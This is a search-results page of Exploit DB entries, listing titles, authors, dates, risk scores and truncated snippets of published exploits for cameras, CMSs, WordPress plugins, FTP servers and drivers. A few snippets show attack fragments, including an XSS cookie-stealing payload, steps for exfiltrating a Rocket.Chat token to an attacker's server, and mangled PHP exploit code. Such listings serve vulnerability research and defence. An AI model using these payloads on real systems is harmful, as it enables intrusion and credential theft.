Lucene search
K
ExploitdbMost viewed

47904 matches found

Exploit DB
Exploit DB
added 2021/01/22 12:0 a.m.279 views

Selea Targa IP OCR-ANPR Camera - CSRF Add Admin

Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin Date: 07.11.2020 Exploit Author: LiquidWorm Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/09 12:0 a.m.279 views

Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF

Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF Date: 28-08-2020 Vendor Homepage: https://www.gxgroup.eu/ont-products/ Exploit Author: Jinson Varghese Behanan @JinsonCyberSec Author Advisory:...

6.5CVSS6.6AI score0.031EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/07/06 12:0 a.m.279 views

RSA IG&L Aveksa 7.1.1 - Remote Code Execution

Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution Date: 2019-04-16 Exploit Author: Jakub Palaczynski, Lukasz Plonka Vendor Homepage: https://www.rsa.com/ Version: 7.1.1, prior to P02 CVE : CVE-2019-3759 all vulnerable versions can be found at...

8.1CVSS7.3AI score0.03226EPSS
Exploits3
Exploit DB
Exploit DB
added 2019/10/23 12:0 a.m.279 views

Rocket.Chat 2.1.0 - Cross-Site Scripting

Title: Rocket.Chat 2.1.0 - Cross-Site Scripting Author: 3H34N Date: 2019-10-22 Product: Rocket.Chat Vendor: https://rocket.chat/ Vulnerable Versions: Rocket.Chat 2. Open a chat session 3. Send payload with your web server url 4. Token will be written in logs.txt when target seen your message...

6.1CVSS6.5AI score0.04023EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/10/03 12:0 a.m.279 views

PHP 7.0 < 7.3 (Unix) - 'gc' disable_functions Bypass

= 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$i = 0; $i = 8; function leak$addr, $p = 0, $s = 8 global $abc, $helper; write$abc, 0x68, $addr + $p - 0x10; $leak = strlen$helper-a; if$s != 8 $leak %= 2 $s 8 - 1; return $leak; function parseelf$base $etype =...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/12 12:0 a.m.279 views

Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts

Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs such as web browsers and constitutes an attack surface for memory corruption bugs, as it...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2019/07/12 12:0 a.m.279 views

Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting

Exploit Title: Persistent XSS - Dependency Graph View Pluginv0.13 Vendor Homepage: https://wiki.jenkins.io/display/JENKINS/Dependency+Graph+View+Plugin Exploit Author: Ishaq Mohammed Contact: https://twitter.com/securityprince Website: https://about.me/security-prince Category: webapps Platform:...

5.4CVSS5.8AI score0.03885EPSS
Exploits5
Exploit DB
Exploit DB
added 2006/02/25 12:0 a.m.279 views

D3Jeeb Pro 3 - 'catogary.php?catid' SQL Injection

source: https://www.securityfocus.com/bid/16853/info D3Jeeb is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could allow an attacker to...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/06/13 12:0 a.m.278 views

Freefloat FTP Server 1.0 - Remote Buffer Overflow

Exploit Title: Freefloat FTP Server 1.0 - Remote Buffer Overflow Date: 22 may 2025 Notification vendor: No reported Discovery by: Fernando Mengali LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/ Version: 1.0 Tested on: Windows XP SP3 English - Version 5.1 Build...

9.8CVSS7.4AI score0.10947EPSS
Exploits13
Exploit DB
Exploit DB
added 2025/04/09 12:0 a.m.278 views

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution RCE Exploit Author: Yesith Alvarez Vendor Homepage: https://hugegraph.apache.org/docs/download/download/ Version: Apache HugeGraph 1.0.0 - 1.2.0 CVE : CVE-2024–27348 from requests import Request, Session import sys import json d...

9.8CVSS9.8AI score0.9921EPSS
Exploits11
Exploit DB
Exploit DB
added 2024/05/13 12:0 a.m.278 views

Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)

Chyrp 2.5.2 - Stored Cross-Site Scripting XSS Date: 2024-04-24 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://github.com/chyrp/ Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip Version: 2.5.2 Tested on: MacOS Steps to Reproduce - Login from the address:...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2023/08/04 12:0 a.m.278 views

WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution

Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution Date: 2023-07-20 Exploit Author: Mehmet Kelepçe Vendor Homepage: https://wpmudev.com/project/forminator-pro/ Software Link: https://wordpress.org/plugins/forminator/ Version: 1.24.6 Tested on: PHP - Mysql...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2023/08/04 12:0 a.m.278 views

ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)

Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution RCE Google Dork: None Date: July 31, 2023 Exploit Author: Riyan Firmansyah of Seclab Vendor Homepage: https://ruijienetworks.com Software Link: https://www.ruijienetworks.com/support/documents/slideEW1200G-PRO-Firmware-B11P204 Version...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/07/20 12:0 a.m.278 views

Webile v1.0.1 - Multiple Cross Site Scripting

Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2321 Release Date: ============= 2023-07-03 Vulnerability Laboratory ID VL-ID: ==================================== 2321 Common Vulnerability...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/07/20 12:0 a.m.278 views

RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)

Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow SEH Date: 18/07/2023 Exploit Author: Andre Nogueira Vendor Homepage: https://www.raidenftpd.com/en/ Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe Version: RaidenFTPD 2.4.4005 Tested on: Microsoft Windows 10 Build 19045 1.-...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/07/19 12:0 a.m.278 views

CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)

Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution RCE Application: CmsMadeSimple Version: v2.2.17 Bugs: Remote Code ExecutionRCE Technology: PHP Vendor URL: https://www.cmsmadesimple.org/ Software Link: https://www.cmsmadesimple.org/downloads/cmsms Date of found: 12-07-2023 Author:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/06/06 12:0 a.m.278 views

Macro Expert 4.9 - Unquoted Service Path

Exploit Title: Macro Expert 4.9 - Unquoted Service Path Date: 04/06/2023 Exploit Author: Murat DEMIRCI Vendor Homepage: http://www.macro-expert.com/ Software Link: http://www.macro-expert.com/product/gmsetup4.9.exe Version: 4.9 Tested on: Windows 10 Proof of Concept : C:\Users\Muratsc qc "Macro...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/06/14 12:0 a.m.278 views

Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)

Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery CSRF Date: 27/5/2022 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://www.marvalnorthamerica.com/ Software Link: https://www.marvalnorthamerica.com/ Version: v14.19.0.12476 Tested on: Windows PoCs:...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2022/05/11 12:0 a.m.278 views

Anuko Time Tracker - SQLi (Authenticated)

Exploit Title: Anuko Time Tracker - SQLi Authenticated Date: 2022-05-03 Exploit Author: Altelus Vendor Homepage: https://www.anuko.com/ Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d Version: Anuko Time Tracker 1.20.0.5640 Tested on: Linux CVE :...

8.8CVSS8.8AI score0.07159EPSS
Exploits5
Exploit DB
Exploit DB
added 2022/02/16 12:0 a.m.278 views

H3C SSL VPN - Username Enumeration

Exploit Title: H3C SSL VPN - Username Enumeration Exploit Author: LiquidWorm H3C SSL VPN Username Enumeration Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd. Product web page: https://www.h3c.com Affected version: n/a Summary: H3C SSL VPN is a secure VPN system based on SSL...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/02/02 12:0 a.m.278 views

WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)

Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting XSS Date: 3/16/2021 Author: 0xB9 Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/ Version: 1.13.21 Tested on: Windows 10 CVE: CVE-2021-24300 1. Description: This plugin is a easy...

6.1CVSS6.5AI score0.10587EPSS
Exploits5
Exploit DB
Exploit DB
added 2022/02/02 12:0 a.m.278 views

uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)

Exploit Title: uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting XSS Exploit Author: Vulnerability-Lab Date: 21/01/2022 Document Title: =============== uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities References Source: ====================...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/16 12:0 a.m.278 views

Magic Home Pro 1.5.1 - Authentication Bypass

Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass Google Dork: NA Date: 22 October 2020 Exploit Author: Victor Hanna Trustwave SpiderLabs Author Github Page: https://9lyph.github.io/CVE-2020-27199/ Vendor Homepage: http://www.zengge.com/appkzd Software Link:...

7.5CVSS7.6AI score0.02875EPSS
Exploits4
Exploit DB
Exploit DB
added 2020/07/26 12:0 a.m.278 views

ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection

Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection Google Dork: intitle:"Applications Manager Login Screen" Date: 2020-07-23 Exploit Author: aldorm Vendor Homepage: https://www.manageengine.com/ Software Link: Version: 12 and 13 before Build 13200 Tested on:...

9.8CVSS9.6AI score0.04772EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/02/24 12:0 a.m.278 views

ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure

Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure Author: Todor Donev Date: 2020-02-23 Vendor: www.escam.cn Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en CVE: N/A !/usr/bin/perl ESCAM QD-900 WIFI HD Camera Remote...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/07/24 12:0 a.m.278 views

Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery

Product : Cisco Wireless Controller Version : 3.6.10E last version Date: 23.07.2019 Vendor Homepage: https://www.cisco.com Exploit Author: Mehmet Önder Key Website: htts://cloudvist.com CVE: CVE-2019-12624 Description : The application interface allows users to perform certain actions via HTTP...

8.8CVSS9AI score0.18706EPSS
Exploits2
Exploit DB
Exploit DB
added 2019/05/08 12:0 a.m.278 views

Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ', 'Description' = %q An unauthenticated attacker with network access to the...

9.8CVSS9AI score0.99964EPSS
Exploits35
Exploit DB
Exploit DB
added 2019/01/28 12:0 a.m.278 views

WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download

Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File Download Google Dork: N/A Date: 25.01.2019 Vendor Homepage: https://web-dorado.com/products/wordpress-ad-manager-wd.html Software: https://wordpress.org/plugins/ad-manager-wd Version: 1.0.11 Tested on: Win7 x64, Exploit Author...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2016/05/30 12:0 a.m.278 views

MySQL 5.5.45 - procedure analyse Function Denial of Service

!/usr/bin/env python Title: MySQL Procedure Analyse DoS Exploit Author: Osanda Malith Jayathissa @OsandaMalith E-Mail: osandacatunseen.is Version: Vulnerable upto MySQL 5.5.45 Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-487...

4CVSS7.9AI score0.30146EPSS
Exploits6
Exploit DB
Exploit DB
added 2009/06/01 12:0 a.m.278 views

unclassified NewsBoard 1.6.4 - Multiple Vulnerabilities

Author girex Homepage girex.altervista.org Date 31/05/2009 CMS Unclassified NewsBoard 1.6.4 and maybe lower Dork "This board is powered by the Unclassified NewsBoard software, 1.6.4" Multiple remote vulnerabilities 1 Remote SQL Injection php.ini regardless 2 Logs File Disclosure registerglobals =...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2009/03/05 12:0 a.m.278 views

Libc - 'libc:fts_*()' Local Denial of Service

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 libc:fts:multiple vendors, Denial-of-service Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 21.10.2008 - - Pub.: 04.03.2009 CVE: CVE-2009-0537 We are going informing all vendors, about this problem. Affected Software official: - -...

4.9CVSS6.4AI score0.03592EPSS
Exploits6
Exploit DB
Exploit DB
added 2006/11/21 12:0 a.m.278 views

phpPC 1.04 - Multiple Remote File Inclusions

phpPC 1.04 Multiples Remote File Inclusion Script : PHP Poll Creator Version : 1.04 Vendor URL : http://www.phppc.de Impact : Remote File Inclusion Discovered by : iss4m Contact : [email protected] Vulnerable code in poll.php -------------------------------- ?php if $isphppcincluded != 1 include...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2024/03/03 12:0 a.m.277 views

Enrollment System v1.0 - SQL Injection

Exploit Title: Enrollment System v1.0 - SQL Injection Date: 27 December 2023 Exploit Author: Gnanaraj Mauviel @0xm3m Vendor: Obi08 Vendor Homepage: https://github.com/Obi08/EnrollmentSystem Software Link: https://github.com/Obi08/EnrollmentSystem Version: v1.0 Tested on: Mac OSX, XAMPP, Apache,...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/07/19 12:0 a.m.277 views

CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)

Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection SSTI Application: CmsMadeSimple Version: v2.2.17 Bugs: SSTI Technology: PHP Vendor URL: https://www.cmsmadesimple.org/ Software Link: https://www.cmsmadesimple.org/downloads/cmsms Date of found: 13-07-2023...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/04/07 12:0 a.m.277 views

Opmon 9.11 - Cross-site Scripting

Exploit Title: Opmon 9.11 - Cross-site Scripting Date: 2021-06-01 Exploit Author: p3tryx Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time Version: 9.11 Tested on: Chrome, IE and Firefox CVE : CVE-2021-43009 URL POC: alertdocument.cookie; var i=new Image;...

6.1CVSS7AI score0.02293EPSS
Exploits4
Exploit DB
Exploit DB
added 2022/03/10 12:0 a.m.277 views

BattlEye 0.9 - 'BEService' Unquoted Service Path

Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path Date: 09/03/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://www.battleye.com/ Software Link: https://www.battleye.com/downloads/ Version: 0.94 Tested: Windows 10 Pro Contact: https://twitter.com/dmaral3noz C:\Users\saudhsc...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/03/07 12:0 a.m.277 views

Hasura GraphQL 2.2.0 - Information Disclosure

Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure Software: Hasura GraphQL Community Software Link: https://github.com/hasura/graphql-engine Version: 2.2.0 Exploit Author: Dolev Farhi Date: 5/05/2022 Tested on: Ubuntu import requests SERVERADDR = 'x.x.x.x' url =...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.277 views

Automox Agent 32 - Local Privilege Escalation

Exploit Title: Automox Agent 32 - Local Privilege Escalation Date: 13/12/2021 Exploit Author: Greg Foss Writeup: https://www.lacework.com/blog/cve-2021-43326/ Vendor Homepage: https://www.automox.com/ Software Link: https://support.automox.com/help/agents Version: 31, 32, 33 Tested on: Windows 10...

7.8CVSS7.7AI score0.01234EPSS
Exploits5
Exploit DB
Exploit DB
added 2021/12/20 12:0 a.m.277 views

Exponent CMS 2.6 - Multiple Vulnerabilities

Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities Exploit Author: heinjame Date: 22/10/2021 Exploit Author: picaroo Vendor Homepage: https://www.exponentcms.org/ Version: http://127.0.0.1:8082/expcms/text/edit/id/id/src/@footer Title, Text Block Payload = " Database credential are...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/10/08 12:0 a.m.277 views

Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection

Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection Date: 07.10.2021 Exploit Author: Amine ismail @aminei Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html Software Link:...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2021/06/16 12:0 a.m.277 views

Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)

Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection Authenticated Date: 05-10-2021 Exploit Author: nhattruong Vendor Homepage: https://phpgurukul.com Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ Version: 1.0 Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/05/24 12:0 a.m.277 views

Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)

Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE Authenticated Date: 21.05.2021 Exploit Author: Emir Polat Vendor Homepage: https://www.schlix.com/ Software Link: https://www.schlix.com/html/schlix-cms-downloads.html Version: 2.2.6-6 Tested On: Ubuntu...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/03/09 12:0 a.m.277 views

Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path

Exploit Title: Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path Date: 2021-1-20 Exploit Author: Mohammed Alshehri Vendor Homepage: sandboxie-plus.com Software Link: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.2/Sandboxie-Plus-x64-v0.7.2.exe Version: Version 0.7.2 Test...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/15 12:0 a.m.277 views

Tasks 9.7.3 - Insecure Permissions

Exploit Title: Tasks 9.7.3 - Insecure Permissions Date: 18th of July, 2020 Exploit Author: Lyhin's Lab Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/ Vendor Homepage: https://tasks.org/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/09 12:0 a.m.277 views

iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path

Exploit Title: iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path Discovery by: Leslie Lara Discovery Date: 7-09-2020 Vendor Homepage: https://www.huawei.com/en/corporate-information Software Links :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/09/28 12:0 a.m.277 views

MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation

/ Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation Date: 2020-09-24 Exploit Author: Matteo Malvica Vendor Homepage: https://www.msi.com Software Link: https://msi.gm/ABLTMNB Driver: MSIO64.sys SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD...

7.8CVSS7.9AI score0.02075EPSS
Exploits4
Exploit DB
Exploit DB
added 2020/01/16 12:0 a.m.277 views

Online Book Store 1.0 - Arbitrary File Upload

Exploit Title: Online Book Store 1.0 - Arbitrary File Upload Google Dork: N/A Date: 2020-01-16 Exploit Author: Or4nG.M4n aka S4udiExploit Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/07/10 12:0 a.m.277 views

Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator

-----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType to some...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/01/24 12:0 a.m.277 views

Joomla! Component JHotelReservation 6.0.7 - SQL Injection

Exploit Title: Joomla! Component JHotelReservation 6.0.7 - SQL Injection Dork: N/A Date: 2019-01-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://cmsjunkie.com/ Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jhotelreservation/...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2019/01/23 12:0 a.m.277 views

Joomla! Component vBizz 1.0.7 - SQL Injection

Exploit Title: Joomla! Component vBizz 1.0.7 - SQL Injection Dork: N/A Date: 2019-01-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://wdmtech.com/ Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/ Version: 1.0.7 Category: Webapps Tested on:...

7.4AI score
Exploits0
Total number of security vulnerabilities5000